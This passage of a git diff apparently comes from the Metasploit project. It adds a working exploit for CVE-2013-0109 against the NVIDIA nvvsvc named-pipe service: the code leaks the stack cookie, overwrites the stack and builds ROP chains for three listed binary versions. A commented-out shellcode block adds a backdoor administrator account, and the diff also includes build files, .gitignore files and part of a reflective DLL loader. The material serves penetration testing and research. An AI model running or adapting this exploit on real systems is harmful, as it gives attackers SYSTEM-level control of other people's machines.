{ ProtocolAction_Send, BuildMalicious_LeakStack(), 0x4020 },
{ ProtocolAction_Receive, { 0 }, 0x4200 },
{ ProtocolAction_ReadCookie, { 0 }, 0 },
{ ProtocolAction_Send, BuildMalicious_FillBuf(), 0x4020 },
{ ProtocolAction_Receive, { 0 }, 0x4000 },
{ ProtocolAction_Send, BuildMalicious_OverwriteStack(), 0x4020 },
{ ProtocolAction_Receive, { 0 }, 0x4200 },
{ ProtocolAction_Disconnect, NULL, 0 },
};
DWORD dwNumberOfMessages = sizeof(rgConvoMsg) / sizeof(ProtocolMessage), i = 0;
BOOL bTryAgain = FALSE;
char szPipe[256] = "\\\\.\\pipe\\nvsr";
// We could renable remote hosts to target other devices on network?!
// sprintf(szPipe, "\\\\%s\\pipe\\nvsr", argv[1]);
while (i < dwNumberOfMessages)
{
printf("\n\tAction %u of %u: ", i + 1, dwNumberOfMessages);
switch (rgConvoMsg[i].Action)
{
case ProtocolAction_Connect:
printf(" - CONNECT\n");
hPipe = EstablishPipeConnection(szPipe);
if (!hPipe)
{
printf("!! Unable to create named pipe (GetLastError() = %u [0x%x])\n", GetLastError(), GetLastError());
goto Cleanup;
}
break;
case ProtocolAction_Disconnect:
printf(" - DISCONNECT\n");
CloseHandle(hPipe);
hPipe = NULL;
break;
case ProtocolAction_Send:
printf(" - CLIENT => SERVER\n");
if (!(dwBytesInOut = WritePipe(hPipe, rgConvoMsg[i].Buf, rgConvoMsg[i].Length)))
{
printf("!! Error writing to pipe\n");
goto Cleanup;
}
printf("\t\tWritten %u (0x%x) characters to pipe\n", dwBytesInOut, dwBytesInOut);
break;
case ProtocolAction_Receive:
printf("\t - SERVER => CLIENT\n");
if (!(dwBytesInOut = ReadPipe(hPipe, rgReadBuf, rgConvoMsg[i].Length, FALSE)))
{
printf("!! Error reading from pipe (at least, no data on pipe)\n");
goto Cleanup;
}
printf("\t\tRead %u (0x%x) characters from pipe\n", dwBytesInOut, dwBytesInOut);
break;
case ProtocolAction_ReadCookie:
// x64 Metasploit cmd/exec:
// "net user r00t r00t00r! /add & net localgroup administrators /add"
// exitfunc=thread
/*char code[] = ""
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
"\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff"
"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x6d\x64"
"\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x72\x30"
"\x30\x74\x20\x72\x30\x30\x74\x30\x30\x72\x21\x20\x2f\x61\x64"
"\x64\x20\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72"
"\x6f\x75\x70\x20\x61\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74"
"\x6f\x72\x73\x20\x72\x30\x30\x74\x20\x2f\x61\x64\x64\x00";*/
printf("Building exploit ...\n");
unsigned __int64 uiStackCookie = *(unsigned __int64 *)(rgReadBuf + 0x4034);
printf("\t\t => Stack cookie 0&x:\n", (DWORD)(uiStackCookie >> 32), (DWORD)uiStackCookie);
memcpy(rgConvoMsg[4].Buf + 0xc + 0xc, &uiStackCookie, 8);
unsigned __int64 uiRetnAddress = *(unsigned __int64 *)(rgReadBuf + 0x4034 + 8), uiBase = 0, *pRopChain = NULL;
// Perform some limited fingerprinting (my default install version, vs latest at time of testing)
switch (uiRetnAddress & 0xfff)
{
case 0x640: // nvvsvc.exe - 03 Nov 2011 - 1,640,768 bytes - md5=3947ad5d03e6abcce037801162fdb90d
uiBase = uiRetnAddress - 0x4640;
printf("\t\t => nvvsvc.exe base 0&x:\n", (DWORD)(uiBase >> 32), (DWORD)uiBase);
pRopChain = (unsigned __int64 *)(rgConvoMsg[4].Buf + 0xc + 0xc + (7 * 8));
// Param 1: lpAddress [r11 (near rsp) into rcx]
pRopChain[0] = uiBase + 0x19e6e; // nvvsvc.exe+0x19e6e: mov rax, r11; retn
pRopChain[1] = uiBase + 0xa6d64; // nvvsvc.exe+0xa6d64: mov rcx, rax; mov eax, [rcx+4]; add rsp, 28h; retn
pRopChain[2] = 0; // Padding
pRopChain[3] = 0; // ...
pRopChain[4] = 0; // ...
pRopChain[5] = 0; // ...
pRopChain[6] = 0; // ...
pRopChain[7] = uiBase + 0x7773; // nvvsvc.exe+0x7773: pop rax; retn
pRopChain[8] = 0x1; // Param 2: dwSize [rdx = 1 (whole page)]
pRopChain[9] = uiBase + 0xa8653; // nvvsvc.exe+0xa8653: mov rdx, rax; mov rax, rdx; add rsp, 28h; retn
pRopChain[10] = 0; // Padding
pRopChain[11] = 0; // ...
pRopChain[12] = 0; // ...
pRopChain[13] = 0; // ...
pRopChain[14] = 0; // ...
pRopChain[15] = uiBase + 0x7772; // nvvsvc.exe+0x7772: pop r8; retn
pRopChain[16] = 0x40; // Param 3: flNewProtect [r8 = 0x40 (PAGE_EXECUTE_READWRITE)]
pRopChain[17] = uiBase + 0x7773; // nvvsvc.exe+0x7773: pop rax; retn
// Param 4: lpflOldProtect [r9 - already points at writable location]
pRopChain[18] = uiBase + 0xfe5e0; // nvvsvc.exe+0xfe5e0: IAT entry &VirtualProtect
pRopChain[19] = uiBase + 0x5d60; // nvvsvc.exe+0x5d60: mov rax, [rax]; retn
pRopChain[20] = uiBase + 0x91a85; // nvvsvc.exe+0x91a85: jmp rax
pRopChain[21] = uiBase + 0xe6251; // nvvsvc.exe+0xe6251: jmp rsp (return address from VirtualProtect)
memcpy(pRopChain + 22, payload, payloadLen);
break;
case 0x9f1: // nvvsvc.exe - 30 Aug 2012 - 891,240 bytes - md5=43f91595049de14c4b61d1e76436164f
uiBase = uiRetnAddress - 0x39f1;
printf("\t\t => nvvsvc.exe base 0&x:\n", (DWORD)(uiBase >> 32), (DWORD)uiBase);
pRopChain = (unsigned __int64 *)(rgConvoMsg[4].Buf + 0xc + 0xc + (7 * 8));
// Param 1: lpAddress [r11 (near rsp) into rcx]
pRopChain[0] = uiBase + 0x15d36; // nvvsvc.exe+0x15d36: mov rax, r11; retn
pRopChain[1] = uiBase + 0x5493c; // nvvsvc.exe+0x5493c: mov rcx, rax; mov eax, [rcx+4]; add rsp, 28h; retn
pRopChain[2] = 0; // Padding ...
pRopChain[3] = 0; // ...
pRopChain[4] = 0; // ...
pRopChain[5] = 0; // ...
pRopChain[6] = 0; // ...
pRopChain[7] = uiBase + 0xd202; // nvvsvc.exe+0xd202: pop rax; retn
pRopChain[8] = 0x1; // Param 2: dwSize [rdx = 1 (whole page)]
pRopChain[9] = uiBase + 0x55dbf; // nvvsvc.exe+0x55dbf: mov rdx, rax; mov rax, rdx; add rsp, 28h; retn
pRopChain[10] = 0; // Padding ...
pRopChain[11] = 0; // ...
pRopChain[12] = 0; // ...
pRopChain[13] = 0; // ...
pRopChain[14] = 0; // ...
// Param 3: flNewProtect [r8 = 0x40 (PAGE_EXECUTE_READWRITE)]
pRopChain[15] = uiBase + 0xd202; // nvvsvc.exe+0xd202: pop rax; retn
pRopChain[16] = 0x40; // PAGE_EXECUTE_READWRITE
pRopChain[17] = uiBase + 0x8b92; // nvvsvc.exe+0x55dbf: mov r8d, eax; mov eax, r8d; add rsp, 28h; retn
pRopChain[18] = 0; // Padding ...
pRopChain[19] = 0; // ...
pRopChain[20] = 0; // ...
pRopChain[21] = 0; // ...
pRopChain[22] = 0; // ...
// Param 4: lpflOldProtect [r9 - already points at writable location]
pRopChain[23] = uiBase + 0xd202; // nvvsvc.exe+0xd202: pop rax; retn
pRopChain[24] = uiBase + 0x91308; // IAT entry &VirtualProtect - 0x130
pRopChain[25] = uiBase + 0x82989; // nvvsvc.exe+0x82989: mov rax, [rax+130h]; add rsp, 28h; retn
pRopChain[26] = 0; // Padding ...
pRopChain[27] = 0; // ...
pRopChain[28] = 0; // ...
pRopChain[29] = 0; // ...
pRopChain[30] = 0; // ...
pRopChain[31] = uiBase + 0x44ba6; // nvvsvc.exe+0x44ba6: jmp eax
pRopChain[32] = uiBase + 0x77c59; // nvvsvc.exe+0x77c59: jmp esp
memcpy(pRopChain + 33, payload, payloadLen);
break;
case 0xa11: // nvvsvc.exe - 01 Dec 2012 - 890,216 md5=3341d2c91989bc87c3c0baa97c27253b
uiBase = uiRetnAddress - 0x3a11;
printf("\t\t => nvvsvc.exe base 0&x:\n", (DWORD)(uiBase >> 32), (DWORD)uiBase);
pRopChain = (unsigned __int64 *)(rgConvoMsg[4].Buf + 0xc + 0xc + (7 * 8));
// Param 1: lpAddress [r11 (near rsp) into rcx]
pRopChain[0] = uiBase + 0x15b52; // nvvsvc.exe+0x15b52: mov rax, r11; retn
pRopChain[1] = uiBase + 0x54d4c; // nvvsvc.exe+0x54d4c: mov rcx, rax; mov eax, [rcx+4]; add rsp, 28h; retn
pRopChain[2] = 0; // Padding ...
pRopChain[3] = 0; // ...
pRopChain[4] = 0; // ...
pRopChain[5] = 0; // ...
pRopChain[6] = 0; // ...
pRopChain[7] = uiBase + 0x8d7aa; // nvvsvc.exe+0x8d7aa: pop rdx; add al, 0; pop rbp; retn
pRopChain[8] = 0x1; // Param 2: dwSize [rdx = 1 (whole page)]
pRopChain[9] = 0; // Padding ...
// Param 3: flNewProtect [r8 = 0x40 (PAGE_EXECUTE_READWRITE)]
pRopChain[10] = uiBase + 0xd33a; // nvvsvc.exe+0xd33a: pop rax; retn
pRopChain[11] = 0x40; // PAGE_EXECUTE_READWRITE
pRopChain[12] = uiBase + 0x8d26; // nvvsvc.exe+0x8d26: mov r8d, eax; mov eax, r8d; add rsp, 28h; retn
pRopChain[13] = 0; // Padding ...
pRopChain[14] = 0; // ...
pRopChain[15] = 0; // ...
pRopChain[16] = 0; // ...
pRopChain[17] = 0; // ...
// Param 4: lpflOldProtect [r9 - already points at writable location]
pRopChain[18] = uiBase + 0xd33a; // nvvsvc.exe+0xd33a: pop rax; retn
pRopChain[19] = uiBase + 0x91310; // IAT entry &VirtualProtect - 0x128
pRopChain[20] = uiBase + 0x82851; // nvvsvc.exe+0x82851: mov rax, [rax+128h]; add rsp, 28h; retn
pRopChain[21] = 0; // Padding ...
pRopChain[22] = 0; // ...
pRopChain[23] = 0; // ...
pRopChain[24] = 0; // ...
pRopChain[25] = 0; // ...
pRopChain[26] = uiBase + 0x44fb6; // nvvsvc.exe+0x44fb6: jmp rax
pRopChain[27] = uiBase + 0x8a0dc; // nvvsvc.exe+0x8a0dc: push rsp; retn
memcpy(pRopChain + 28, payload, payloadLen);
break;
}
break;
}
i++;
}
Cleanup:
if (hPipe)
{
CloseHandle(hPipe);
}
}

View File

@ -0,0 +1,6 @@
#ifndef _METASPLOIT_SOURCE_NVIDIA_NVSVC_H
#define _METASPLOIT_SOURCE_NVIDIA_NVSVC_H
VOID elevate_nvidia_nvsvc(LPVOID payload);
#endif

View File

@ -0,0 +1,142 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{6B3FF768-1F25-49C1-8827-EDEC84D4749F}</ProjectGuid>
<RootNamespace>nvidia_nvsvc</RootNamespace>
<Keyword>Win32Proj</Keyword>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>false</WholeProgramOptimization>
<PlatformToolset>v120</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v120</PlatformToolset>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
</ImportGroup>
<ImportGroup Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup>
<_ProjectFileVersion>10.0.30319.1</_ProjectFileVersion>
<OutDir>$(Configuration)\$(Platform)\</OutDir>
<IntDir>$(Configuration)\$(Platform)\</IntDir>
<LinkIncremental>false</LinkIncremental>
<GenerateManifest>false</GenerateManifest>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRules />
<CodeAnalysisRuleAssemblies />
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<Optimization>Disabled</Optimization>
<AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;nvidia_nvsvcessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
</ClCompile>
<Link>
<AdditionalDependencies>Mpr.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
<DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
<GenerateDebugInformation>true</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<TargetMachine>MachineX86</TargetMachine>
<ModuleDefinitionFile>
</ModuleDefinitionFile>
<AdditionalOptions>/ignore:4070</AdditionalOptions>
</Link>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL</Command>
</PostBuildEvent>
<ResourceCompile>
<PreprocessorDefinitions>_DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ResourceCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<Optimization>MinSpace</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>false</IntrinsicFunctions>
<AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;nvidia_nvsvcessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FunctionLevelLinking>false</FunctionLevelLinking>
<PrecompiledHeader>
</PrecompiledHeader>
<AssemblerListingLocation>$(OutDir)\</AssemblerListingLocation>
<ObjectFileName>$(OutDir)\</ObjectFileName>
<ProgramDataBaseFileName>$(OutDir)\</ProgramDataBaseFileName>
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<BufferSecurityCheck>false</BufferSecurityCheck>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
</ClCompile>
<Link>
<AdditionalDependencies>Mpr.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
<IgnoreAllDefaultLibraries>false</IgnoreAllDefaultLibraries>
<IgnoreSpecificDefaultLibraries>%(IgnoreSpecificDefaultLibraries)</IgnoreSpecificDefaultLibraries>
<DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
<GenerateDebugInformation>false</GenerateDebugInformation>
<GenerateMapFile>true</GenerateMapFile>
<MapFileName>$(OutDir)\nvidia_nvsvc.map</MapFileName>
<SubSystem>Windows</SubSystem>
<OptimizeReferences>
</OptimizeReferences>
<EnableCOMDATFolding>
</EnableCOMDATFolding>
<RandomizedBaseAddress>false</RandomizedBaseAddress>
<DataExecutionPrevention>
</DataExecutionPrevention>
<ImportLibrary>$(OutDir)\nvidia_nvsvc.lib</ImportLibrary>
<TargetMachine>MachineX86</TargetMachine>
<Profile>false</Profile>
<ModuleDefinitionFile>
</ModuleDefinitionFile>
<AdditionalOptions>/ignore:4070</AdditionalOptions>
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "..\..\..\..\..\data\exploits\CVE-2013-0109\" GOTO COPY
mkdir "..\..\..\..\..\data\exploits\CVE-2013-0109\"
:COPY
copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\exploits\CVE-2013-0109\"</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="dllmain.c" />
<ClCompile Include="nvidia_nvsvc.cpp" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="nvidia_nvsvc.h" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
</ImportGroup>
</Project>

View File

@ -0,0 +1,10 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<ClCompile Include="nvidia_nvsvc.cpp" />
<ClCompile Include="dllmain.c" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="nvidia_nvsvc.h" />
</ItemGroup>
</Project>

View File

@ -0,0 +1,152 @@
## Ignore Visual Studio temporary files, build results, and
## files generated by popular Visual Studio add-ons.
# User-specific files
*.suo
*.user
*.sln.docstates
# Build results
[Dd]ebug/
[Rr]elease/
x64/
build/
[Bb]in/
[Oo]bj/
# Enable "build/" folder in the NuGet Packages folder since NuGet packages use it for MSBuild targets
!packages/*/build/
# MSTest test Results
[Tt]est[Rr]esult*/
[Bb]uild[Ll]og.*
*_i.c
*_p.c
*.ilk
*.meta
*.obj
*.pch
*.pdb
*.pgc
*.pgd
*.rsp
*.sbr
*.tlb
*.tli
*.tlh
*.tmp
*.tmp_proj
*.log
*.vspscc
*.vssscc
.builds
*.pidb
*.log
*.scc
# Visual C++ cache files
ipch/
*.aps
*.ncb
*.opensdf
*.sdf
*.cachefile
# Visual Studio profiler
*.psess
*.vsp
*.vspx
# Guidance Automation Toolkit
*.gpState
# ReSharper is a .NET coding add-in
_ReSharper*/
*.[Rr]e[Ss]harper
# TeamCity is a build add-in
_TeamCity*
# DotCover is a Code Coverage Tool
*.dotCover
# NCrunch
*.ncrunch*
.*crunch*.local.xml
# Installshield output folder
[Ee]xpress/
# DocProject is a documentation generator add-in
DocProject/buildhelp/
DocProject/Help/*.HxT
DocProject/Help/*.HxC
DocProject/Help/*.hhc
DocProject/Help/*.hhk
DocProject/Help/*.hhp
DocProject/Help/Html2
DocProject/Help/html
# Click-Once directory
publish/
# Publish Web Output
*.Publish.xml
*.pubxml
# NuGet Packages Directory
## TODO: If you have NuGet Package Restore enabled, uncomment the next line
#packages/
# Windows Azure Build Output
csx
*.build.csdef
# Windows Store app package directory
AppPackages/
# Others
sql/
*.Cache
ClientBin/
[Ss]tyle[Cc]op.*
~$*
*~
*.dbmdl
*.[Pp]ublish.xml
*.pfx
*.publishsettings
# RIA/Silverlight projects
Generated_Code/
# Backup & report files from converting an old project file to a newer
# Visual Studio version. Backup files are not needed, because we have git ;-)
_UpgradeReport_Files/
Backup*/
UpgradeLog*.XML
UpgradeLog*.htm
# SQL Server files
App_Data/*.mdf
App_Data/*.ldf
# =========================
# Windows detritus
# =========================
# Windows image file caches
Thumbs.db
ehthumbs.db
# Folder config file
Desktop.ini
# Recycle Bin used on file shares
$RECYCLE.BIN/
# Mac crap
.DS_Store

View File

@ -26,6 +26,13 @@ PUSHD CVE-2010-0232
msbuild.exe make.msbuild /target:%PLAT% msbuild.exe make.msbuild /target:%PLAT%
POPD POPD
IF "%ERRORLEVEL%"=="0" (
ECHO "Building CVE-2013-0109 (nvidia_nvsvc)"
PUSHD CVE-2013-0109
msbuild.exe make.msbuild /target:%PLAT%
POPD
)
IF "%ERRORLEVEL%"=="0" ( IF "%ERRORLEVEL%"=="0" (
ECHO "Building CVE-2013-3660 (ppr_flatten_rec)" ECHO "Building CVE-2013-3660 (ppr_flatten_rec)"
PUSHD CVE-2013-3660 PUSHD CVE-2013-3660

152
external/source/vncdll/.gitignore vendored Normal file
View File

@ -0,0 +1,152 @@
## Ignore Visual Studio temporary files, build results, and
## files generated by popular Visual Studio add-ons.
# User-specific files
*.suo
*.user
*.sln.docstates
# Build results
[Dd]ebug/
[Rr]elease/
x64/
build/
[Bb]in/
[Oo]bj/
# Enable "build/" folder in the NuGet Packages folder since NuGet packages use it for MSBuild targets
!packages/*/build/
# MSTest test Results
[Tt]est[Rr]esult*/
[Bb]uild[Ll]og.*
*_i.c
*_p.c
*.ilk
*.meta
*.obj
*.pch
*.pdb
*.pgc
*.pgd
*.rsp
*.sbr
*.tlb
*.tli
*.tlh
*.tmp
*.tmp_proj
*.log
*.vspscc
*.vssscc
.builds
*.pidb
*.log
*.scc
# Visual C++ cache files
ipch/
*.aps
*.ncb
*.opensdf
*.sdf
*.cachefile
# Visual Studio profiler
*.psess
*.vsp
*.vspx
# Guidance Automation Toolkit
*.gpState
# ReSharper is a .NET coding add-in
_ReSharper*/
*.[Rr]e[Ss]harper
# TeamCity is a build add-in
_TeamCity*
# DotCover is a Code Coverage Tool
*.dotCover
# NCrunch
*.ncrunch*
.*crunch*.local.xml
# Installshield output folder
[Ee]xpress/
# DocProject is a documentation generator add-in
DocProject/buildhelp/
DocProject/Help/*.HxT
DocProject/Help/*.HxC
DocProject/Help/*.hhc
DocProject/Help/*.hhk
DocProject/Help/*.hhp
DocProject/Help/Html2
DocProject/Help/html
# Click-Once directory
publish/
# Publish Web Output
*.Publish.xml
*.pubxml
# NuGet Packages Directory
## TODO: If you have NuGet Package Restore enabled, uncomment the next line
#packages/
# Windows Azure Build Output
csx
*.build.csdef
# Windows Store app package directory
AppPackages/
# Others
sql/
*.Cache
ClientBin/
[Ss]tyle[Cc]op.*
~$*
*~
*.dbmdl
*.[Pp]ublish.xml
*.pfx
*.publishsettings
# RIA/Silverlight projects
Generated_Code/
# Backup & report files from converting an old project file to a newer
# Visual Studio version. Backup files are not needed, because we have git ;-)
_UpgradeReport_Files/
Backup*/
UpgradeLog*.XML
UpgradeLog*.htm
# SQL Server files
App_Data/*.mdf
App_Data/*.ldf
# =========================
# Windows detritus
# =========================
# Windows image file caches
Thumbs.db
ehthumbs.db
# Folder config file
Desktop.ini
# Recycle Bin used on file shares
$RECYCLE.BIN/
# Mac crap
.DS_Store

View File

@ -1,131 +0,0 @@
//===============================================================================================//
// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#include "LoadLibraryR.h"
//===============================================================================================//
DWORD Rva2Offset( DWORD dwRva, UINT_PTR uiBaseAddress )
{
WORD wIndex = 0;
PIMAGE_SECTION_HEADER pSectionHeader = NULL;
PIMAGE_NT_HEADERS pNtHeaders = NULL;
pNtHeaders = (PIMAGE_NT_HEADERS)(uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew);
pSectionHeader = (PIMAGE_SECTION_HEADER)((UINT_PTR)(&pNtHeaders->OptionalHeader) + pNtHeaders->FileHeader.SizeOfOptionalHeader);
if( dwRva < pSectionHeader[0].PointerToRawData )
return dwRva;
for( wIndex=0 ; wIndex < pNtHeaders->FileHeader.NumberOfSections ; wIndex++ )
{
if( dwRva >= pSectionHeader[wIndex].VirtualAddress && dwRva < (pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].SizeOfRawData) )
return ( dwRva - pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].PointerToRawData );
}
return 0;
}
//===============================================================================================//
DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer )
{
UINT_PTR uiBaseAddress = 0;
UINT_PTR uiExportDir = 0;
UINT_PTR uiNameArray = 0;
UINT_PTR uiAddressArray = 0;
UINT_PTR uiNameOrdinals = 0;
DWORD dwCounter = 0;
#ifdef _WIN64
DWORD dwMeterpreterArch = 2;
#else
DWORD dwMeterpreterArch = 1;
#endif
uiBaseAddress = (UINT_PTR)lpReflectiveDllBuffer;
// get the File Offset of the modules NT Header
uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
// currenlty we can only process a PE file which is the same type as the one this fuction has
// been compiled as, due to various offset in the PE structures being defined at compile time.
if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x010B ) // PE32
{
if( dwMeterpreterArch != 1 )
return 0;
}
else if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x020B ) // PE64
{
if( dwMeterpreterArch != 2 )
return 0;
}
else
{
return 0;
}
// uiNameArray = the address of the modules export directory entry
uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
// get the File Offset of the export directory
uiExportDir = uiBaseAddress + Rva2Offset( ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress, uiBaseAddress );
// get the File Offset for the array of name pointers
uiNameArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames, uiBaseAddress );
// get the File Offset for the array of addresses
uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress );
// get the File Offset for the array of name ordinals
